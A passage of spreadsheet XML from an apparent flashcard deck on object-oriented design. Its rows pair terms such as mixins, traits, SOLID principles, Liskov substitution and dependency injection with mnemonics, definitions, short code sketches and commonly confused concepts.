          <t>Strictly, delegation keeps self bound to the outer object (helper's self-calls come back to it); forwarding hands off with no self link.</t>
        </is>
      </c>
      <c r="F456" t="inlineStr">
        <is>
          <t>JS prototypes: method runs with this=rex / (true delegation); wrapper calling / self.file.log(s) is mere forwarding</t>
        </is>
      </c>
      <c r="G456" t="inlineStr">
        <is>
          <t>Everyday usage — most code called 'delegation' is technically forwarding; true delegation rebinds self/this, as in JS prototypes.</t>
        </is>
      </c>
      <c r="H456" t="inlineStr">
        <is>
          <t>A speakerphone patch-through versus a message relay.</t>
        </is>
      </c>
      <c r="J456" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K456" t="inlineStr">
        <is>
          <t>Composition &amp; delegation</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" t="n">
        <v>0</v>
      </c>
      <c r="B457" t="inlineStr">
        <is>
          <t>455</t>
        </is>
      </c>
      <c r="C457" t="inlineStr">
        <is>
          <t>Aggregation vs composition</t>
        </is>
      </c>
      <c r="D457" t="inlineStr">
        <is>
          <t>Your heart versus a rented tuxedo: the heart is COMPOSED into you and dies with you; the tux is AGGREGATED — the shop keeps it when you are gone.</t>
        </is>
      </c>
      <c r="E457" t="inlineStr">
        <is>
          <t>Both are has-a: in composition the whole owns the part's lifetime (part dies with it); in aggregation parts live independently.</t>
        </is>
      </c>
      <c r="F457" t="inlineStr">
        <is>
          <t>House owns its Rooms (composition) / Team references Players (aggregation) / # players outlive the team</t>
        </is>
      </c>
      <c r="G457" t="inlineStr">
        <is>
          <t>Association — plain association is any link at all; aggregation and composition add whole-part meaning and lifetime rules.</t>
        </is>
      </c>
      <c r="H457" t="inlineStr">
        <is>
          <t>An engine bolted in versus passengers aboard.</t>
        </is>
      </c>
      <c r="J457" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K457" t="inlineStr">
        <is>
          <t>Composition &amp; delegation</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" t="n">
        <v>0</v>
      </c>
      <c r="B458" t="inlineStr">
        <is>
          <t>456</t>
        </is>
      </c>
      <c r="C458" t="inlineStr">
        <is>
          <t>Mixins</t>
        </is>
      </c>
      <c r="D458" t="inlineStr">
        <is>
          <t>Ice-cream MIX-INS: your scoop keeps its vanilla identity, but the counter smashes cookie chunks and sprinkles (methods) into it on the cold slab.</t>
        </is>
      </c>
      <c r="E458" t="inlineStr">
        <is>
          <t>Small classes that inject a bundle of methods into others via (multiple) inheritance, adding capability without being a base type.</t>
        </is>
      </c>
      <c r="F458" t="inlineStr">
        <is>
          <t>class JsonMixin: / def to_json(self): return dumps(vars(self)) / class User(JsonMixin, Base): ...</t>
        </is>
      </c>
      <c r="G458" t="inlineStr">
        <is>
          <t>Base class — a base defines what the class IS; a mixin only donates what it can DO and is never meant to stand alone.</t>
        </is>
      </c>
      <c r="H458" t="inlineStr">
        <is>
          <t>A spice rack shaken over any dish.</t>
        </is>
      </c>
      <c r="J458" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K458" t="inlineStr">
        <is>
          <t>Composition &amp; delegation</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" t="n">
        <v>0</v>
      </c>
      <c r="B459" t="inlineStr">
        <is>
          <t>457</t>
        </is>
      </c>
      <c r="C459" t="inlineStr">
        <is>
          <t>Traits</t>
        </is>
      </c>
      <c r="D459" t="inlineStr">
        <is>
          <t>Character TRAIT cards in a deck-builder: snap 'Flies' and 'Sings' onto your hero card; if two cards grant the same move, the rulebook forces YOU to pick one, out loud.</t>
        </is>
      </c>
      <c r="E459" t="inlineStr">
        <is>
          <t>Composable units of behavior (Scala, Rust, PHP) like mixins, but with explicit rules for resolving name conflicts.</t>
        </is>
      </c>
      <c r="F459" t="inlineStr">
        <is>
          <t>trait Fly { fn fly(&amp;self); } / impl Fly for Duck { ... } // Rust</t>
        </is>
      </c>
      <c r="G459" t="inlineStr">
        <is>
          <t>Mixin — mixins resolve clashes silently by MRO order; traits surface conflicts and demand explicit resolution.</t>
        </is>
      </c>
      <c r="H459" t="inlineStr">
        <is>
          <t>Merit badges sewn onto a scout sash.</t>
        </is>
      </c>
      <c r="J459" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K459" t="inlineStr">
        <is>
          <t>Composition &amp; delegation</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" t="n">
        <v>0</v>
      </c>
      <c r="B460" t="inlineStr">
        <is>
          <t>458</t>
        </is>
      </c>
      <c r="C460" t="inlineStr">
        <is>
          <t>Wrapper as composition</t>
        </is>
      </c>
      <c r="D460" t="inlineStr">
        <is>
          <t>A gift-wrapped megaphone: shout into the wrapping-paper cone and it adds glitter to your words before the real megaphone inside blasts them. Same mouthpiece shape outside.</t>
        </is>
      </c>
      <c r="E460" t="inlineStr">
        <is>
          <t>A wrapper holds the real object and exposes the same interface, adding behavior around forwarded calls (decorator style).</t>
        </is>
      </c>
      <c r="F460" t="inlineStr">
        <is>
          <t>class LoggedFile: / def write(self, s): / log(s); self.inner.write(s)</t>
        </is>
      </c>
      <c r="G460" t="inlineStr">
        <is>
          <t>Subclassing to extend — a wrapper can wrap any implementation at runtime and stack; a subclass is fixed to one parent at compile time.</t>
        </is>
      </c>
      <c r="H460" t="inlineStr">
        <is>
          <t>A phone case with a built-in extra battery.</t>
        </is>
      </c>
      <c r="J460" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K460" t="inlineStr">
        <is>
          <t>Composition &amp; delegation</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" t="n">
        <v>0</v>
      </c>
      <c r="B461" t="inlineStr">
        <is>
          <t>459</t>
        </is>
      </c>
      <c r="C461" t="inlineStr">
        <is>
          <t>Replace inheritance with delegation</t>
        </is>
      </c>
      <c r="D461" t="inlineStr">
        <is>
          <t>A rebellious heir legally un-adopts himself, then HIRES his ex-father as a contractor: same services, now through a signed work order (field plus forwarding), none of the family obligations (inherited API).</t>
        </is>
      </c>
      <c r="E461" t="inlineStr">
        <is>
          <t>Refactoring: turn a dubious subclass into a wrapper that holds the former parent and forwards only what it truly needs.</t>
        </is>
      </c>
      <c r="F461" t="inlineStr">
        <is>
          <t>before: class Stack(list): ... / after: class Stack: / def push(s, x): s._items.append(x)</t>
        </is>
      </c>
      <c r="G461" t="inlineStr">
        <is>
          <t>Wrapper/decorator — the mechanics are identical; this is the refactoring MOVE that gets you there from inheritance.</t>
        </is>
      </c>
      <c r="H461" t="inlineStr">
        <is>
          <t>Divorce papers with a service contract stapled on.</t>
        </is>
      </c>
      <c r="J461" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K461" t="inlineStr">
        <is>
          <t>Composition &amp; delegation</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" t="n">
        <v>0</v>
      </c>
      <c r="B462" t="inlineStr">
        <is>
          <t>460</t>
        </is>
      </c>
      <c r="C462" t="inlineStr">
        <is>
          <t>SOLID principles</t>
        </is>
      </c>
      <c r="D462" t="inlineStr">
        <is>
          <t>A blacksmith stamps five runes — S, O, L, I, D — into one SOLID steel beam; the skyscraper bolted onto it never sways when new floors are added.</t>
        </is>
      </c>
      <c r="E462" t="inlineStr">
        <is>
          <t>Five OO design principles—SRP, OCP, LSP, ISP, DIP—popularized by Robert Martin for maintainable, extensible code.</t>
        </is>
      </c>
      <c r="F462" t="inlineStr">
        <is>
          <t>S: one reason to change ... / D: depend on abstractions / (see codes 461-479)</t>
        </is>
      </c>
      <c r="G462" t="inlineStr">
        <is>
          <t>GRASP — GRASP assigns responsibilities (Larman); SOLID constrains class and dependency structure (Martin).</t>
        </is>
      </c>
      <c r="H462" t="inlineStr">
        <is>
          <t>A five-fingered gauntlet gripping a codebase.</t>
        </is>
      </c>
      <c r="J462" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K462" t="inlineStr">
        <is>
          <t>SOLID: SRP &amp; OCP</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" t="n">
        <v>0</v>
      </c>
      <c r="B463" t="inlineStr">
        <is>
          <t>461</t>
        </is>
      </c>
      <c r="C463" t="inlineStr">
        <is>
          <t>Single Responsibility Principle</t>
        </is>
      </c>
      <c r="D463" t="inlineStr">
        <is>
          <t>A Swiss Army knife melted in the dishwasher: corkscrew, saw, and scissors fused into one blob — sharpening the blade now bends the scissors. One tool, one job.</t>
        </is>
      </c>
      <c r="E463" t="inlineStr">
        <is>
          <t>A class should have exactly one responsibility—one reason to change—so unrelated pressures never tug at the same code.</t>
        </is>
      </c>
      <c r="F463" t="inlineStr">
        <is>
          <t>bad: Report.calculate + format + email / good: Calculator, Formatter, Mailer</t>
        </is>
      </c>
      <c r="G463" t="inlineStr">
        <is>
          <t>Separation of concerns — SoC is the system-wide idea; SRP is its per-class rule, measured in reasons to change.</t>
        </is>
      </c>
      <c r="H463" t="inlineStr">
        <is>
          <t>A one-man band collapsing under his own cymbals.</t>
        </is>
      </c>
      <c r="J463" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K463" t="inlineStr">
        <is>
          <t>SOLID: SRP &amp; OCP</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" t="n">
        <v>0</v>
      </c>
      <c r="B464" t="inlineStr">
        <is>
          <t>462</t>
        </is>
      </c>
      <c r="C464" t="inlineStr">
        <is>
          <t>One reason to change</t>
        </is>
      </c>
      <c r="D464" t="inlineStr">
        <is>
          <t>One desk phone with two lines ringing at once: ACCOUNTING screams 'change the rounding!' while LEGAL screams 'change the wording!' — the clerk rips the phone in two, one handset per department.</t>
        </is>
      </c>
      <c r="E464" t="inlineStr">
        <is>
          <t>Martin's SRP test: a module should answer to a single actor; two departments demanding edits to it means it should be two classes.</t>
        </is>
      </c>
      <c r="F464" t="inlineStr">
        <is>
          <t>PayrollCalc changes for CFO rules; / PayrollReport changes for auditors / # split: different actors</t>
        </is>
      </c>
      <c r="G464" t="inlineStr">
        <is>
          <t>'Does one thing' — the test is not task count but WHO requests changes: count distinct actors, not functions.</t>
        </is>
      </c>
      <c r="H464" t="inlineStr">
        <is>
          <t>Two puppeteers fighting over one marionette.</t>
        </is>
      </c>
      <c r="J464" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K464" t="inlineStr">
        <is>
          <t>SOLID: SRP &amp; OCP</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" t="n">
        <v>0</v>
      </c>
      <c r="B465" t="inlineStr">
        <is>
          <t>463</t>
        </is>
      </c>
      <c r="C465" t="inlineStr">
        <is>
          <t>God object</t>
        </is>
      </c>
      <c r="D465" t="inlineStr">
        <is>
          <t>A 3000-line deity on a cloud named Manager.java: weather, payroll, and toaster settings all require kneeling before it — touch its robe and lightning (merge conflicts) strikes the whole team.</t>
        </is>
      </c>
      <c r="E465" t="inlineStr">
        <is>
          <t>Anti-pattern: one class that knows or does nearly everything, hoarding state and logic that every other part must go through.</t>
        </is>
      </c>
      <c r="F465" t="inlineStr">
        <is>
          <t>class AppManager: # 6k lines / users; orders; ui; cache; email / def do_everything(...)</t>
        </is>
      </c>
      <c r="G465" t="inlineStr">
        <is>
          <t>Facade — a facade is a thin door over subsystems that keep the logic; a god object contains all the logic itself.</t>
        </is>
      </c>
      <c r="H465" t="inlineStr">
        <is>
          <t>An octopus tangled in every cable of the server room.</t>
        </is>
      </c>
      <c r="J465" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K465" t="inlineStr">
        <is>
          <t>SOLID: SRP &amp; OCP</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" t="n">
        <v>0</v>
      </c>
      <c r="B466" t="inlineStr">
        <is>
          <t>464</t>
        </is>
      </c>
      <c r="C466" t="inlineStr">
        <is>
          <t>Separation of concerns</t>
        </is>
      </c>
      <c r="D466" t="inlineStr">
        <is>
          <t>A bento box: rice, fish, and pickles in walled compartments — the wasabi never bleeds into the pudding. One flavor per cell.</t>
        </is>
      </c>
      <c r="E466" t="inlineStr">
        <is>
          <t>Split a system so each part addresses one concern (UI, logic, storage), letting each evolve and be understood alone.</t>
        </is>
      </c>
      <c r="F466" t="inlineStr">
        <is>
          <t>routes.py # HTTP concern / service.py # business rules / repo.py # persistence</t>
        </is>
      </c>
      <c r="G466" t="inlineStr">
        <is>
          <t>SRP — SoC partitions the whole architecture by topic; SRP applies actor-based pressure to each class.</t>
        </is>
      </c>
      <c r="H466" t="inlineStr">
        <is>
          <t>A theater's separate lighting, sound, and costume crews.</t>
        </is>
      </c>
      <c r="J466" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K466" t="inlineStr">
        <is>
          <t>SOLID: SRP &amp; OCP</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" t="n">
        <v>0</v>
      </c>
      <c r="B467" t="inlineStr">
        <is>
          <t>465</t>
        </is>
      </c>
      <c r="C467" t="inlineStr">
        <is>
          <t>Open-Closed Principle</t>
        </is>
      </c>
      <c r="D467" t="inlineStr">
        <is>
          <t>A pinball machine with a sealed glass top but an OPEN expansion slot on the side: snap in new bumpers without ever unscrewing the glass over the working table.</t>
        </is>
      </c>
      <c r="E467" t="inlineStr">
        <is>
          <t>Software should be open for extension but closed for modification: add behavior via new code, not edits to tested code.</t>
        </is>
      </c>
      <c r="F467" t="inlineStr">
        <is>
          <t>new PaymentMethod subclass ships / new behavior; process() is untouched</t>
        </is>
      </c>
      <c r="G467" t="inlineStr">
        <is>
          <t>Immutability — immutability freezes runtime data; OCP freezes existing SOURCE while welcoming new modules.</t>
        </is>
      </c>
      <c r="H467" t="inlineStr">
        <is>
          <t>A sealed console with a cartridge slot.</t>
        </is>
      </c>
      <c r="J467" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K467" t="inlineStr">
        <is>
          <t>SOLID: SRP &amp; OCP</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" t="n">
        <v>0</v>
      </c>
      <c r="B468" t="inlineStr">
        <is>
          <t>466</t>
        </is>
      </c>
      <c r="C468" t="inlineStr">
        <is>
          <t>Extension points</t>
        </is>
      </c>
      <c r="D468" t="inlineStr">
        <is>
          <t>A power strip screwed onto the engine block: mechanics plug new gadgets into labeled sockets; nobody ever splices wires into the loom itself.</t>
        </is>
      </c>
      <c r="E468" t="inlineStr">
        <is>
          <t>Deliberate seams—hooks, plugin registries, abstract slots—where new behavior can be added without touching core code.</t>
        </is>
      </c>
      <c r="F468" t="inlineStr">
        <is>
          <t>@app.register_plugin('pdf') / class PdfExporter(Exporter): ...</t>
        </is>
      </c>
      <c r="G468" t="inlineStr">
        <is>
          <t>Fork-and-edit — extension points invite additions from outside; forking modifies the core and forfeits upgrades.</t>
        </is>
      </c>
      <c r="H468" t="inlineStr">
        <is>
          <t>Guitar pedalboard jacks awaiting new pedals.</t>
        </is>
      </c>
      <c r="J468" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K468" t="inlineStr">
        <is>
          <t>SOLID: SRP &amp; OCP</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" t="n">
        <v>0</v>
      </c>
      <c r="B469" t="inlineStr">
        <is>
          <t>467</t>
        </is>
      </c>
      <c r="C469" t="inlineStr">
        <is>
          <t>Strategy as OCP enabler</t>
        </is>
      </c>
      <c r="D469" t="inlineStr">
        <is>
          <t>A chess coach's binder of laminated STRATEGY cards: slide 'Sicilian' out, slide 'King's Gambit' in — the player (context) plays whatever card sits in the sleeve, never rewired.</t>
        </is>
      </c>
      <c r="E469" t="inlineStr">
        <is>
          <t>Encapsulate interchangeable algorithms behind one interface and inject the choice, so new variants extend without editing callers.</t>
        </is>
      </c>
      <c r="F469" t="inlineStr">
        <is>
          <t>class Shipping(Protocol): / def cost(self, order): ... / order.total(FlatRate()) # or ByWeight()</t>
        </is>
      </c>
      <c r="G469" t="inlineStr">
        <is>
          <t>Template method — template fixes the skeleton in a base class (inheritance); strategy swaps whole algorithms by composition.</t>
        </is>
      </c>
      <c r="H469" t="inlineStr">
        <is>
          <t>A DJ swapping vinyl records mid-set.</t>
        </is>
      </c>
      <c r="J469" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K469" t="inlineStr">
        <is>
          <t>SOLID: SRP &amp; OCP</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" t="n">
        <v>0</v>
      </c>
      <c r="B470" t="inlineStr">
        <is>
          <t>468</t>
        </is>
      </c>
      <c r="C470" t="inlineStr">
        <is>
          <t>Divergent change</t>
        </is>
      </c>
      <c r="D470" t="inlineStr">
        <is>
          <t>One steering wheel wired to two cars welded side by side: Monday you steer the left car's road trip, Tuesday the right's — every turn is a fight. Saw them apart.</t>
        </is>
      </c>
      <c r="E470" t="inlineStr">
        <is>
          <t>Smell: one class keeps changing for different reasons on different occasions—evidence it bundles multiple responsibilities.</t>
        </is>
      </c>
      <c r="F470" t="inlineStr">
        <is>
          <t>UserService edited for auth rules, / then email templates, / then avatar resizing</t>
        </is>
      </c>
      <c r="G470" t="inlineStr">
        <is>
          <t>Shotgun surgery — divergent change: many reasons hit ONE class; shotgun surgery: one reason forces edits across MANY classes.</t>
        </is>
      </c>
      <c r="H470" t="inlineStr">
        <is>
          <t>One closet stuffed for both beach and ski trips.</t>
        </is>
      </c>
      <c r="J470" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K470" t="inlineStr">
        <is>
          <t>SOLID: SRP &amp; OCP</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" t="n">
        <v>0</v>
      </c>
      <c r="B471" t="inlineStr">
        <is>
          <t>469</t>
        </is>
      </c>
      <c r="C471" t="inlineStr">
        <is>
          <t>Speculative generality</t>
        </is>
      </c>
      <c r="D471" t="inlineStr">
        <is>
          <t>A house wired with forty light switches labeled FUTURE JACUZZI and MAYBE OBSERVATORY — guests flip them all, nothing happens, but the wiring bill was very real.</t>
        </is>
      </c>
      <c r="E471" t="inlineStr">
        <is>
          <t>Smell: abstractions, hooks, and parameters built for imagined future needs that never arrive, taxing every reader today.</t>
        </is>
      </c>
      <c r="F471" t="inlineStr">
        <is>
          <t>class AbstractUserFactoryProvider: / ... # exactly one subclass, ever</t>
        </is>
      </c>
      <c r="G471" t="inlineStr">
        <is>
          <t>YAGNI — YAGNI is the preventive maxim; speculative generality is the smell you find where it was ignored.</t>
        </is>
      </c>
      <c r="H471" t="inlineStr">
        <is>
          <t>A tuxedo bought for a wedding never scheduled.</t>
        </is>
      </c>
      <c r="J471" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K471" t="inlineStr">
        <is>
          <t>SOLID: SRP &amp; OCP</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" t="n">
        <v>0</v>
      </c>
      <c r="B472" t="inlineStr">
        <is>
          <t>470</t>
        </is>
      </c>
      <c r="C472" t="inlineStr">
        <is>
          <t>Liskov Substitution Principle</t>
        </is>
      </c>
      <c r="D472" t="inlineStr">
        <is>
          <t>The understudy steps into the lead role mid-show; if even one audience member notices the swap, the understudy has failed LISKOV's audition.</t>
        </is>
      </c>
      <c r="E472" t="inlineStr">
        <is>
          <t>Subtypes must be usable anywhere their base type is expected without breaking the program's expectations.</t>
        </is>
      </c>
      <c r="F472" t="inlineStr">
        <is>
          <t>def drain(b: Battery): b.discharge() / # every Battery subtype must drain safely</t>
        </is>
      </c>
      <c r="G472" t="inlineStr">
        <is>
          <t>Syntactic subtyping — merely compiling is not enough; LSP demands behavioral compatibility with the base contract.</t>
        </is>
      </c>
      <c r="H472" t="inlineStr">
        <is>
          <t>A generic-brand part fitting the machine exactly.</t>
        </is>
      </c>
      <c r="J472" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K472" t="inlineStr">
        <is>
          <t>SOLID: LSP, ISP &amp; DIP</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" t="n">
        <v>0</v>
      </c>
      <c r="B473" t="inlineStr">
        <is>
          <t>471</t>
        </is>
      </c>
      <c r="C473" t="inlineStr">
        <is>
          <t>Rectangle-square problem</t>
        </is>
      </c>
      <c r="D473" t="inlineStr">
        <is>
          <t>A stretching machine grabs a 'rectangle' by both handles; the square SCREAMS as both its sides move together, crushing the operator's test gauge.</t>
        </is>
      </c>
      <c r="E473" t="inlineStr">
        <is>
          <t>Classic LSP violation: a Square subclassing Rectangle breaks code that sets width and height independently.</t>
        </is>
      </c>
      <c r="F473" t="inlineStr">
        <is>
          <t>r.width = 4; r.height = 5 / assert r.area() == 20 # Square gives 25!</t>
        </is>
      </c>
      <c r="G473" t="inlineStr">
        <is>
          <t>Math intuition — mathematically a square IS a rectangle; behaviorally, with mutable setters, it violates the contract.</t>
        </is>
      </c>
      <c r="H473" t="inlineStr">
        <is>
          <t>A square peg sold in the rectangle aisle.</t>
        </is>
      </c>
      <c r="J473" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K473" t="inlineStr">
        <is>
          <t>SOLID: LSP, ISP &amp; DIP</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" t="n">
        <v>0</v>
      </c>
      <c r="B474" t="inlineStr">
        <is>
          <t>472</t>
        </is>
      </c>
      <c r="C474" t="inlineStr">
        <is>
          <t>Behavioral subtyping rules</t>
        </is>
      </c>
      <c r="D474" t="inlineStr">
        <is>
          <t>The diner's new heir may ACCEPT more coupons than dad did (weaker precondition) and pile portions HIGHER (stronger postcondition) — but never the reverse, or the regulars riot.</t>
        </is>
      </c>
      <c r="E474" t="inlineStr">
        <is>
          <t>Valid subtypes never strengthen preconditions, never weaken postconditions, and preserve base invariants: require less, promise more.</t>
        </is>
      </c>
      <c r="F474" t="inlineStr">
        <is>
          <t>base: needs x &gt;= 0, returns non-null / sub: may accept any x, / must still return non-null</t>
        </is>
      </c>
      <c r="G474" t="inlineStr">
        <is>
          <t>Covariance rules — variance governs the TYPES of params and returns; these rules govern the logical CONTRACT strength.</t>
        </is>
      </c>
      <c r="H474" t="inlineStr">
        <is>
          <t>Franchise terms a new branch may loosen but never tighten.</t>
        </is>
      </c>
      <c r="J474" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K474" t="inlineStr">
        <is>
          <t>SOLID: LSP, ISP &amp; DIP</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" t="n">
        <v>0</v>
      </c>
      <c r="B475" t="inlineStr">
        <is>
          <t>473</t>
        </is>
      </c>
      <c r="C475" t="inlineStr">
        <is>
          <t>Covariance &amp; contravariance</t>
        </is>
      </c>
      <c r="D475" t="inlineStr">
        <is>
          <t>A vending machine upgrade may dispense a FANCIER snack than promised (narrower return, CO-variant) and accept MORE kinds of coins (wider input, CONTRA-variant) — never stingier or pickier.</t>
        </is>
      </c>
      <c r="E475" t="inlineStr">
        <is>
          <t>Safe override typing: return types may narrow in the subclass (covariant); parameter types may widen (contravariant).</t>
        </is>
      </c>
      <c r="F475" t="inlineStr">
        <is>
          <t>base: def get(self) -&gt; Animal / sub: def get(self) -&gt; Cat # covariant ok / sub may accept wider params too</t>
        </is>
      </c>
      <c r="G475" t="inlineStr">
        <is>
          <t>Generic variance — the same words applied to type parameters of containers (List[Cat] vs List[Animal]), not method overrides.</t>
        </is>
      </c>
      <c r="H475" t="inlineStr">
        <is>
          <t>A funnel: wide mouth for input, narrow spout for output.</t>
        </is>
      </c>
      <c r="J475" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K475" t="inlineStr">
        <is>
          <t>SOLID: LSP, ISP &amp; DIP</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" t="n">
        <v>0</v>
      </c>
      <c r="B476" t="inlineStr">
        <is>
          <t>474</t>
        </is>
      </c>
      <c r="C476" t="inlineStr">
        <is>
          <t>Refused bequest</t>
        </is>
      </c>
      <c r="D476" t="inlineStr">
        <is>
          <t>The heir shoves grandma's BEQUEATHED piano off the moving truck: he signed as heir but refuses the goods. Penguin extends Bird, then throws on fly().</t>
        </is>
      </c>
      <c r="E476" t="inlineStr">
        <is>
          <t>Smell: a subclass inherits methods it does not want and stubs or breaks them—a sign the is-a relationship is wrong.</t>
        </is>
      </c>
      <c r="F476" t="inlineStr">
        <is>
          <t>class Penguin(Bird): / def fly(self): / raise NotImplementedError</t>
        </is>
      </c>
      <c r="G476" t="inlineStr">
        <is>
          <t>Abstract stub — abstract methods are contracts awaiting code; refused bequest actively rejects promises already inherited.</t>
        </is>
      </c>
      <c r="H476" t="inlineStr">
        <is>
          <t>Returning inherited mail marked 'not at this address'.</t>
        </is>
      </c>
      <c r="J476" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K476" t="inlineStr">
        <is>
          <t>SOLID: LSP, ISP &amp; DIP</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" t="n">
        <v>0</v>
      </c>
      <c r="B477" t="inlineStr">
        <is>
          <t>475</t>
        </is>
      </c>
      <c r="C477" t="inlineStr">
        <is>
          <t>Interface Segregation Principle</t>
        </is>
      </c>
      <c r="D477" t="inlineStr">
        <is>
          <t>A 40-page diner menu forced on the espresso cart: the barista must stock snails just to sell coffee. Chop the menu into laminated cards, one per stall.</t>
        </is>
      </c>
      <c r="E477" t="inlineStr">
        <is>
          <t>Clients should not be forced to depend on methods they do not use: split fat interfaces into small, client-specific ones.</t>
        </is>
      </c>
      <c r="F477" t="inlineStr">
        <is>
          <t>bad: Machine: print+scan+fax / good: Printer, Scanner protocols; / OldPrinter implements Printer only</t>
        </is>
      </c>
      <c r="G477" t="inlineStr">
        <is>
          <t>SRP — SRP splits by the reasons a CLASS changes; ISP splits by what each CLIENT actually calls.</t>
        </is>
      </c>
      <c r="H477" t="inlineStr">
        <is>
          <t>Cable-TV bundle versus a-la-carte channels.</t>
        </is>
      </c>
      <c r="J477" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K477" t="inlineStr">
        <is>
          <t>SOLID: LSP, ISP &amp; DIP</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" t="n">
        <v>0</v>
      </c>
      <c r="B478" t="inlineStr">
        <is>
          <t>476</t>
        </is>
      </c>
      <c r="C478" t="inlineStr">
        <is>
          <t>Fat interface vs role interface</t>
        </is>
      </c>
      <c r="D478" t="inlineStr">
        <is>
          <t>A costume trunk versus a name badge: the fat interface makes every visitor drag the whole costume trunk on stage; the role interface hands them one badge saying CAN_PAY — all the scene needs.</t>
        </is>
      </c>
      <c r="E478" t="inlineStr">
        <is>
          <t>A fat (header) interface mirrors one class's every method; a role interface captures just the one collaboration a client needs.</t>
        </is>
      </c>
      <c r="F478" t="inlineStr">
        <is>
          <t>fat: IEmployee (32 methods) / role: Payable{pay()}, Promotable{...}</t>
        </is>
      </c>
      <c r="G478" t="inlineStr">
        <is>
          <t>ISP — ISP is the principle; fat versus role interface is the vocabulary naming the disease and its cure.</t>
        </is>
      </c>
      <c r="H478" t="inlineStr">
        <is>
          <t>A Swiss Army knife handle versus a single key.</t>
        </is>
      </c>
      <c r="J478" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K478" t="inlineStr">
        <is>
          <t>SOLID: LSP, ISP &amp; DIP</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" t="n">
        <v>0</v>
      </c>
      <c r="B479" t="inlineStr">
        <is>
          <t>477</t>
        </is>
      </c>
      <c r="C479" t="inlineStr">
        <is>
          <t>Dependency Inversion Principle</t>
        </is>
      </c>
      <c r="D479" t="inlineStr">
        <is>
          <t>The penthouse no longer runs cables down into the boiler room; both floors bolt onto a steel INTERFACE beam mid-building, and the boiler crew hangs THEIR pipes up to the beam. The dependency's gravity is inverted.</t>
        </is>
      </c>
      <c r="E479" t="inlineStr">
        <is>
          <t>High-level policy and low-level details both depend on abstractions; abstractions never depend on details.</t>
        </is>
      </c>
      <c r="F479" t="inlineStr">
        <is>
          <t>class Store(Protocol): def save(...): ... / class App: uses Store # points up / class SqlStore(Store): ... # points up</t>
        </is>
      </c>
      <c r="G479" t="inlineStr">
        <is>
          <t>Dependency injection — injection is a delivery technique; inversion is about which direction source dependencies point.</t>
        </is>
      </c>
      <c r="H479" t="inlineStr">
        <is>
          <t>A wall socket owned by the house, not by the appliance maker.</t>
        </is>
      </c>
      <c r="J479" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K479" t="inlineStr">
        <is>
          <t>SOLID: LSP, ISP &amp; DIP</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" t="n">
        <v>0</v>
      </c>
      <c r="B480" t="inlineStr">
        <is>
          <t>478</t>
        </is>
      </c>
      <c r="C480" t="inlineStr">
        <is>
          <t>Dependency injection</t>
        </is>
      </c>
      <c r="D480" t="inlineStr">
        <is>
          <t>A hospital IV bag drips collaborators straight into the patient's arm — the patient never brews its own medicine. Swap the bag, change the behavior, same patient.</t>
        </is>
      </c>
      <c r="E480" t="inlineStr">
        <is>
          <t>Technique: an object's dependencies are supplied from outside (constructor, setter, parameter) rather than created inside it.</t>
        </is>
      </c>
      <c r="F480" t="inlineStr">
        <is>
          <t>svc = ReportService(db=PostgresDb()) / test = ReportService(db=FakeDb())</t>
        </is>
      </c>
